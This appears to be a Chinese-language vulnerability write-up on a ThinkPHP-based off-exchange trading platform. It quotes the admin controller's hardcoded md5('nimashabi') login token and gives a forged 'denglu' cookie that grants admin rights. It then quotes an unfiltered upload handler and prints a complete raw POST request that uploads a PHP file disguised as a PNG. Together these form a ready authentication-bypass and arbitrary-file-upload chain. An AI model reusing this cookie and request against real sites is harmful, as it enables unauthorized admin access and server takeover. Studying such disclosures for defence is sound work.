某微交易场外黑平台漏洞合集

彦祖 185

Part.1 构造

在/application/admin/controller/Base.php

<?php
namespace app\admin\controller;
use think\Controller;
use think\Db;

class Base extends Controller
{
    public function __construct(){
       parent::__construct();
       $otype = session('otype');
        if($otype && $otype == 3){
            /*
            if (session('userid') != '1') {
                $ip = $_SERVER["REMOTE_ADDR"];
                $time = date('Y-m-d H:i:s');
                file_put_contents("尝试入侵日志.txt","地址:".$ip."||时间:".$time.PHP_EOL,FILE_APPEND); 
                die;
            }
            */
        }

       //session_unset();
       //验证登录
       $login = cookie('denglu');
       if(!isset($login['userid'])){
         $this->error('请先登录!','login/login',1,1);
       }

       if(!isset($login['token']) || $login['token'] != md5('nimashabi')){
         $this->redirect('login/logout');
       }

       $request = \think\Request::instance();

       $contrname = $request->controller();
        $actionname = $request->action();
        $params = $request->param();;

        $this->assign('contrname',$contrname);
        $this->assign('actionname',$actionname);
        $this->assign('params',$params);

        $this->otype = $login['otype'];
        $this->uid = $login['userid'];
        $this->uname = $login['username'];

        $this->assign('otype',$this->otype);
    }

    protected function fetch($template = '', $vars = [], $replace = [], $config = [])
    {
        $replace['__ADMIN__'] = str_replace('/index.php','',\think\Request::instance()->root()).'/static/admin';
        return $this->view->fetch($template, $vars, $replace, $config);
    }

    public function check(){
        if($this->otype != 3){
            $this->error('无权限操作');
        }
    }

    public function adminLog($msg = '',$type = 2)
    {
        $data = [
            'admin_id' => isset($this->uid) ?$this->uid:0,
            'name' => isset($this->uname) ?$this->uname: "无",
            'type' => $type,
            'controller' => request()->controller(),
            'action' => request()->action(),
            'info' => $msg,
            'ip' => request()->ip(),
            'created_at' => date('Y-m-d H:i:s'),
            'params' => json_encode(input('param.',JSON_UNESCAPED_UNICODE))
        ];

        Db::name('admin_log')->insert($data);
    }
}

在代码中29行,定义了一个token的值,只要登录的token值为md5(nimashabi)。

if(!isset($login['token']) || $login['token'] != md5('nimashabi'))

构造

denglu=think:{"otype":"3","userid":"1","username":"admin","token":"3c341b110c44ad9e7da4160e4f865b63"}

Part.2 任意文件上传

在/application/admin/controller/Setup.php 参数配置文件中未过滤,导致直接可以上传恶意脚本

   * 编辑配置/比例
     * @author lukui  2017-04-19
     * @return [type] [description]
     */
    public function editconf()
    {
        $this->check();
        if(input('post.')){

            $data = input('post.');

            foreach ($data as $k => $v) {
                $arr = explode('_',$k);
                $_data['id'] = $arr[1];
                $_data['value'] = $v;
                $file = request()->file('pic_'.$_data['id']);

                if($file){

                    $info = $file->move(ROOT_PATH . 'public' . DS . 'uploads');
                    if($info){
                        $_data['value'] = '/public' . DS . 'uploads/'.$info->getSaveName();
                    }
                }
                if($_data['value'] == '' && isset($arr[2]) && $arr[2] == 3){
                    continue;
                }

                Db::name('config')->update($_data);

            }
            cache('conf',null);
            $this->success('编辑成功');
        }

    }

POST包如下:

POST /admin/setup/editconf.html HTTP/1.1
Host: xxxx
Content-Length: 14826
Cache-Control: max-age=0
Origin: https://xxxx
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryos3gT80Ff832vVe3
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://xxx/admin/setup/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:denglu=think%3A%7B%22otype%22%3A%223%22%2C%22userid%22%3A%221%22%2C%22username%22%3A%22admin%22%2C%22token%22%3A%223c341b110c44ad9e7da4160e4f865b63%22%7D
Connection: close

------WebKitFormBoundaryos3gT80Ff832vVe3
Content-Disposition: form-data; name="value_26_2"

------WebKitFormBoundaryos3gT80Ff832vVe3
Content-Disposition: form-data; name="pic_26"; filename="avatar.php"
Content-Type: image/png

DATA
------WebKitFormBoundaryos3gT80Ff832vVe3--

分享